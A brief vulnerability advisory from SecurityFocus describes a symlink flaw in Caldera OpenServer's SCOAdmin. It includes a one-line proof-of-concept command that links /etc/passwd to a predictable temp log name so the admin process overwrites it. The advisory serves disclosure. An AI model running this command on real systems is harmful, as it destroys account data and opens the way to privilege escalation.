Caldera OpenServer SCOAdmin Symbolic Link Vulnerability

The following proof of concept has been provided:

ln -s /etc/passwd /tmp/tclerror.1195.log

If the process ID of the SCOadmin process is 1195, /etc/passwd will be overwritten.


 

Privacy Statement
Copyright 2010, SecurityFocus